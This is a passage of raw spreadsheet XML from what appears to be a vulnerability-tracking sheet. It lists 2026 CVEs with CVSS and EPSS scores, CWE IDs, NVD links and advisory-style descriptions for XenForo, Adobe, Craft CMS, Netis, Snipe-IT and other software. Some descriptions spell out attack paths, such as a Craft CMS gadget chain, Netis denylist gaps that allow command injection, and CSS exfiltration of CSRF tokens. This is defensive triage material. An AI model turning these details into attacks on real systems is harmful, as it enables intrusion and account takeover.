t="inlineStr"><is><t>CVE-2026-73314</t></is></c><c r="D272" s="5" t="n"><v>8.699999999999999</v></c><c r="E272" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F272" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G272" s="5" t="inlineStr" /><c r="H272" s="5" t="n"><v>0.005</v></c><c r="I272" s="5" t="inlineStr" /><c r="J272" s="5" t="inlineStr" /><c r="K272" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L272" s="5" t="inlineStr" /><c r="M272" s="5" t="inlineStr" /><c r="N272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P272" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q272" s="5" t="inlineStr" /><c r="R272" s="5" t="inlineStr"><is><t>CWE-754</t></is></c><c r="S272" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a signature verification logic error in the PayPal REST webhook handler that allows unauthenticated attackers to bypass payment signature validation by submitting a webhook request with an unsupported auth_algo header value. When the algorithm cannot be mapped to a supported hash function, the verification function incorrectly returns true instead of failing, causing the caller to treat the fabricated request as verified and process the payment event without a valid PayPal signature.</t></is></c><c r="T272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t></is></c></row><row r="273"><c r="A273" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C273" s="5" t="inlineStr"><is><t>CVE-2026-73316</t></is></c><c r="D273" s="5" t="n"><v>8.699999999999999</v></c><c r="E273" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F273" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G273" s="5" t="inlineStr" /><c r="H273" s="5" t="n"><v>0.002</v></c><c r="I273" s="5" t="inlineStr" /><c r="J273" s="5" t="inlineStr" /><c r="K273" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L273" s="5" t="inlineStr" /><c r="M273" s="5" t="inlineStr" /><c r="N273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P273" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q273" s="5" t="inlineStr" /><c r="R273" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="S273" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a payment replay vulnerability in the PayPal REST payment provider that allows attackers to process the same webhook payload multiple times by exploiting a missing duplicate transaction ID check. Attackers can replay a valid webhook payload to trigger duplicate payment events, resulting in repeated subscription activations and unauthorized account upgrades.</t></is></c><c r="T273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t></is></c></row><row r="274"><c r="A274" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C274" s="5" t="inlineStr"><is><t>CVE-2026-77111</t></is></c><c r="D274" s="5" t="n"><v>8.699999999999999</v></c><c r="E274" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F274" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G274" s="5" t="inlineStr" /><c r="H274" s="5" t="n"><v>0.005</v></c><c r="I274" s="5" t="inlineStr" /><c r="J274" s="5" t="inlineStr" /><c r="K274" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L274" s="5" t="inlineStr" /><c r="M274" s="5" t="inlineStr" /><c r="N274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P274" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q274" s="5" t="inlineStr" /><c r="R274" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S274" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to bypass security measures and gain unauthorized write access, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t></is></c></row><row r="275"><c r="A275" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C275" s="5" t="inlineStr"><is><t>CVE-2026-80219</t></is></c><c r="D275" s="5" t="n"><v>8.699999999999999</v></c><c r="E275" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F275" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G275" s="5" t="inlineStr" /><c r="H275" s="5" t="n"><v>0.002</v></c><c r="I275" s="5" t="inlineStr" /><c r="J275" s="5" t="inlineStr" /><c r="K275" s="5" t="inlineStr" /><c r="L275" s="5" t="inlineStr" /><c r="M275" s="5" t="inlineStr" /><c r="N275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P275" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q275" s="5" t="inlineStr" /><c r="R275" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S275" s="5" t="inlineStr"><is><t>A flaw was found in hawtio-operator. When deploying Hawtio in cluster mode, the operator creates a cluster-scoped OAuthClient with automatic grant approval (GrantMethod: auto) and no client secret (public client). The redirect URIs are derived from the operator-created Route, whose hostname is tenant-controlled via the Hawtio CR spec.routeHostName field. A malicious tenant can register an arbitrary hostname as a valid OAuth redirect target and, because grants are auto-approved, obtain OpenShift access tokens of any cluster user who visits the crafted authorization URL without any consent prompt.</t></is></c><c r="T275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t></is></c></row><row r="276"><c r="A276" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C276" s="5" t="inlineStr"><is><t>CVE-2026-82064</t></is></c><c r="D276" s="5" t="n"><v>8.699999999999999</v></c><c r="E276" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F276" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G276" s="5" t="inlineStr" /><c r="H276" s="5" t="n"><v>0.003</v></c><c r="I276" s="5" t="inlineStr" /><c r="J276" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K276" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L276" s="5" t="inlineStr" /><c r="M276" s="5" t="inlineStr" /><c r="N276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P276" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q276" s="5" t="inlineStr" /><c r="R276" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S276" s="5" t="inlineStr"><is><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is></c><c r="T276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t></is></c></row><row r="277"><c r="A277" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C277" s="5" t="inlineStr"><is><t>CVE-2026-82075</t></is></c><c r="D277" s="5" t="n"><v>8.699999999999999</v></c><c r="E277" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F277" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G277" s="5" t="inlineStr" /><c r="H277" s="5" t="n"><v>0.003</v></c><c r="I277" s="5" t="inlineStr" /><c r="J277" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K277" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L277" s="5" t="inlineStr" /><c r="M277" s="5" t="inlineStr" /><c r="N277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P277" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q277" s="5" t="inlineStr" /><c r="R277" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S277" s="5" t="inlineStr"><is><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is></c><c r="T277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t></is></c></row><row r="278"><c r="A278" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C278" s="5" t="inlineStr"><is><t>CVE-2026-86727</t></is></c><c r="D278" s="5" t="n"><v>8.699999999999999</v></c><c r="E278" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F278" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G278" s="5" t="inlineStr" /><c r="H278" s="5" t="n"><v>0.003</v></c><c r="I278" s="5" t="inlineStr" /><c r="J278" s="5" t="inlineStr" /><c r="K278" s="5" t="inlineStr" /><c r="L278" s="5" t="inlineStr" /><c r="M278" s="5" t="inlineStr" /><c r="N278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P278" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q278" s="5" t="inlineStr" /><c r="R278" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S278" s="5" t="inlineStr"><is><t>AVideo through 29.0 contains an information disclosure vulnerability in plugin/Live/stats.json.php that allows unauthenticated attackers to retrieve stream keys and m3u8 URLs by accessing the endpoint without authentication. Attackers can enumerate private, unlisted, and group-restricted live streams by parsing the hidden_applications array in the JSON response to obtain sensitive streaming credentials.</t></is></c><c r="T278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t></is></c></row><row r="279"><c r="A279" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C279" s="5" t="inlineStr"><is><t>CVE-2026-86732</t></is></c><c r="D279" s="5" t="n"><v>8.699999999999999</v></c><c r="E279" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F279" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G279" s="5" t="inlineStr" /><c r="H279" s="5" t="n"><v>0.005</v></c><c r="I279" s="5" t="inlineStr" /><c r="J279" s="5" t="inlineStr" /><c r="K279" s="5" t="inlineStr" /><c r="L279" s="5" t="inlineStr" /><c r="M279" s="5" t="inlineStr" /><c r="N279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P279" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q279" s="5" t="inlineStr" /><c r="R279" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S279" s="5" t="inlineStr"><is><t>Craft CMS versions before 5.10.12 contain a remote code execution vulnerability in the element-index endpoint that allows authenticated content editors to instantiate arbitrary classes through the criteria parameter. Attackers can inject a malicious class via criteria[withTransforms][0][class] that reaches ImageTransforms::normalizeTransform(), then use a PHP gadget chain with yii\rbac\PhpManager to execute code by pointing itemFile to a request log containing PHP payload in the User-Agent header.</t></is></c><c r="T279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t></is></c></row><row r="280"><c r="A280" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C280" s="5" t="inlineStr"><is><t>CVE-2026-86738</t></is></c><c r="D280" s="5" t="n"><v>8.699999999999999</v></c><c r="E280" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G280" s="5" t="inlineStr" /><c r="H280" s="5" t="n"><v>0.003</v></c><c r="I280" s="5" t="inlineStr" /><c r="J280" s="5" t="inlineStr" /><c r="K280" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L280" s="5" t="inlineStr" /><c r="M280" s="5" t="inlineStr" /><c r="N280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P280" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q280" s="5" t="inlineStr" /><c r="R280" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S280" s="5" t="inlineStr"><is><t>Snipe-IT versions before 8.7.0 contain a CSS injection vulnerability in the Custom CSS field due to incomplete sanitization that reverses HTML encoding on greater-than and double-quote characters. Superusers can plant malicious CSS payloads using @import and url() references to exfiltrate CSRF tokens from other superusers via attribute-selector rules, enabling account takeover.</t></is></c><c r="T280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t></is></c></row><row r="281"><c r="A281" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C281" s="5" t="inlineStr"><is><t>CVE-2026-34223</t></is></c><c r="D281" s="5" t="n"><v>8.6</v></c><c r="E281" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F281" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G281" s="5" t="inlineStr" /><c r="H281" s="5" t="n"><v>0.001</v></c><c r="I281" s="5" t="inlineStr" /><c r="J281" s="5" t="inlineStr" /><c r="K281" s="5" t="inlineStr" /><c r="L281" s="5" t="inlineStr" /><c r="M281" s="5" t="inlineStr" /><c r="N281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P281" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q281" s="5" t="inlineStr" /><c r="R281" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S281" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Desigo CC ClickOnce Client V6 (All versions), Desigo CC ClickOnce Client V7 (All versions), Desigo CC family V8 (All versions), Desigo CC family V9 (All versions), Desigo CC Flex Client V6 (All versions), Desigo CC Flex Client V7 (All versions), Desigo CC Installed Client V6 (All versions), Desigo CC Installed Client V7 (All versions). The affected application is vulnerable to Client Code Execution (CCE) due to insufficient input validation when handling scripts embedded within user-defined graphics documents.  Specifically, when the script within a graphics document is designed or modified by an attacker to include malicious commands.  When a user opens a compromised graphics document, the embedded script is executed on the client application instance, allowing an attacker to write arbitrary files to the client's operating system. Successful exploitation requires an attacker to craft a malicious graphics document and entice a user with sufficient privileges to display it.  This could lead to compromise of the client operating system and potential lateral movement within the organization.</t></is></c><c r="T281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t></is></c></row><row r="282"><c r="A282" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C282" s="5" t="inlineStr"><is><t>CVE-2026-61517</t></is></c><c r="D282" s="5" t="n"><v>8.6</v></c><c r="E282" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F282" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G282" s="5" t="inlineStr" /><c r="H282" s="5" t="n"><v>0.016</v></c><c r="I282" s="5" t="inlineStr" /><c r="J282" s="5" t="inlineStr" /><c r="K282" s="5" t="inlineStr" /><c r="L282" s="5" t="inlineStr" /><c r="M282" s="5" t="inlineStr" /><c r="N282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P282" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q282" s="5" t="inlineStr" /><c r="R282" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S282" s="5" t="inlineStr"><is><t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an OS command injection vulnerability in the ping diagnostic handler that allows authenticated administrators to execute arbitrary shell commands as root by injecting into the IpAddr parameter. The parameter is interpolated directly into a shell command executed through system() with an incomplete denylist that only blocks spaces, pipes, semicolons, and ampersands, leaving command substitution and alternate field separator expansion available for exploitation.</t></is></c><c r="T282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t></is></c></row><row r="283"><c r="A283" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C283" s="5" t="inlineStr"><is><t>CVE-2026-74239</t></is></c><c r="D283" s="5" t="n"><v>8.6</v></c><c r="E283" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F283" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G283" s="5" t="inlineStr" /><c r="H283" s="5" t="n"><v>0.007</v></c><c r="I283" s="5" t="inlineStr" /><c r="J283" s="5" t="inlineStr" /><c r="K283" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L283" s="5" t="inlineStr" /><c r="M283" s="5" t="inlineStr" /><c r="N283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P283" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q283" s="5" t="inlineStr" /><c r="R283" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S283" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t></is></c><c r="T283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t></is></c></row><row r="284"><c r="A284" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C284" s="5" t="inlineStr"><is><t>CVE-2026-75990</t></is></c><c r="D284" s="5" t="n"><v>8.6</v></c><c r="E284" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F284" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G284" s="5" t="inlineStr" /><c r="H284" s="5" t="n"><v>0.002</v></c><c r="I284" s="5" t="inlineStr" /><c r="J284" s="5" t="inlineStr" /><c r="K284" s="5" t="inlineStr" /><c r="L284" s="5" t="inlineStr" /><c r="M284" s="5" t="inlineStr" /><c r="N284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P284" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q284" s="5" t="inlineStr" /><c r="R284" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S284" s="5" t="inlineStr"><is><t>Illustrator is affected by an Incorrect Authorization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is></c><c r="T284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t></is></c></row><row r="285"><c r="A285" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C285" s="5" t="inlineStr"><is><t>CVE-2026-75991</t></is></c><c r="D285" s="5" t="n"><v>8.6</v></c><c r="E285" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F285" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G285" s="5" t="inlineStr" /><c r="H285" s="5" t="n"><v>0.002</v></c><c r="I285" s="5" t="inlineStr" /><c r="J285" s="5" t="inlineStr" /><c r="K285" s="5" t="inlineStr" /><c r="L285" s="5" t="inlineStr" /><c r="M285" s="5" t="inlineStr" /><c r="N285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P285" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q285" s="5" t="inlineStr" /><c r="R285" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S285" s="5" t="inlineStr"><is><t>Illustrator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is></c><c r="T285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t></is></c></row><row r="286"><c r="A286" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C286" s="5" t="inlineStr"><is><t>CVE-2026-76190</t></is></c><c r="D286" s="5" t="n"><v>8.6</v></c><c r="E286" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F286" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G286" s="5" t="inlineStr" /><c r="H286" s="5" t="n"><v>0.01</v></c><c r="I286" s="5" t="inlineStr" /><c r="J286" s="5" t="inlineStr" /><c r="K286" s="5" t="inlineStr" /><c r="L286" s="5" t="inlineStr" /><c r="M286" s="5" t="inlineStr" /><c r="N286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P286" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q286" s="5" t="inlineStr" /><c r="R286" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S286" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t></is></c></row><row r="287"><c r="A287" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C287" s="5" t="inlineStr"><is><t>CVE-2026-76199</t></is></c><c r="D287" s="5" t="n"><v>8.6</v></c><c r="E287" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F287" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G287" s="5" t="inlineStr" /><c r="H287" s="5" t="n"><v>0.002</v></c><c r="I287" s="5" t="inlineStr" /><c r="J287" s="5" t="inlineStr" /><c r="K287" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L287" s="5" t="inlineStr" /><c r="M287" s="5" t="inlineStr" /><c r="N287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P287" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q287" s="5" t="inlineStr" /><c r="R287" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="S287" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an Uncontrolled Search Path Element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is></c><c r="T287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t></is></c></row><row r="288"><c r="A288" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C288" s="5" t="inlineStr"><is><t>CVE-2026-77109</t></is></c><c r="D288" s="5" t="n"><v>8.6</v></c><c r="E288" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F288" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G288" s="5" t="inlineStr" /><c r="H288" s="5" t="n"><v>0.004</v></c><c r="I288" s="5" t="inlineStr" /><c r="J288" s="5" t="inlineStr" /><c r="K288" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L288" s="5" t="inlineStr" /><c r="M288" s="5" t="inlineStr" /><c r="N288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P288" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q288" s="5" t="inlineStr" /><c r="R288" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S288" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to restricted resources. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t></is></c></row><row r="289"><c r="A289" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C289" s="5" t="inlineStr"><is><t>CVE-2026-77774</t></is></c><c r="D289" s="5" t="n"><v>8.6</v></c><c r="E289" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G289" s="5" t="inlineStr" /><c r="H289" s="5" t="n"><v>0.005</v></c><c r="I289" s="5" t="inlineStr" /><c r="J289" s="5" t="inlineStr" /><c r="K289" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L289" s="5" t="inlineStr" /><c r="M289" s="5" t="inlineStr" /><c r="N289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P289" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q289" s="5" t="inlineStr" /><c r="R289" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S289" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized read access. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t></is></c></row><row r="290"><c r="A290" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C290" s="5" t="inlineStr"><is><t>CVE-2026-79721</t></is></c><c r="D290" s="5" t="n"><v>8.6</v></c><c r="E290" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F290" s="5" t="inlineStr"><is><t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t></is></c><c r="G290" s="5" t="inlineStr" /><c r="H290" s="5" t="n"><v>0.003</v></c><c r="I290" s="5" t="inlineStr" /><c r="J290" s="5" t="inlineStr" /><c r="K290" s="5" t="inlineStr" /><c r="L290" s="5" t="inlineStr" /><c r="M290" s="5" t="inlineStr" /><c r="N290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P290" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q290" s="5" t="inlineStr" /><c r="R290" s="5" t="inlineStr"><is><t>CWE-829</t></is></c><c r="S290" s="5" t="inlineStr"><is><t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t></is></c><c r="T290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t></is></c></row><row r="291"><c r="A291" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C291" s="5" t="inlineStr"><is><t>CVE-2026-80097</t></is></c><c r="D291" s="5" t="n"><v>8.6</v></c><c r="E291" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F291" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G291" s="5" t="inlineStr" /><c r="H291" s="5" t="n"><v>0.004</v></c><c r="I291" s="5" t="inlineStr" /><c r="J291" s="5" t="inlineStr" /><c r="K291" s="5" t="inlineStr" /><c r="L291" s="5" t="inlineStr" /><c r="M291" s="5" t="inlineStr" /><c r="N291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P291" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q291" s="5" t="inlineStr" /><c r="R291" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S291" s="5" t="inlineStr"><is><t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t></is></c></row><row r="292"><c r="A292" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C292" s="5" t="inlineStr"><is><t>CVE-2026-86509</t></is></c><c r="D292" s="5" t="n"><v>8.6</v></c><c r="E292" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F292" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G292" s="5" t="inlineStr" /><c r="H292" s="5" t="n"><v>0.004</v></c><c r="I292" s="5" t="inlineStr" /><c r="J292" s="5" t="inlineStr" /><c r="K292" s="5" t="inlineStr" /><c r="L292" s="5" t="inlineStr" /><c r="M292" s="5" t="inlineStr" /><c r="N292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c 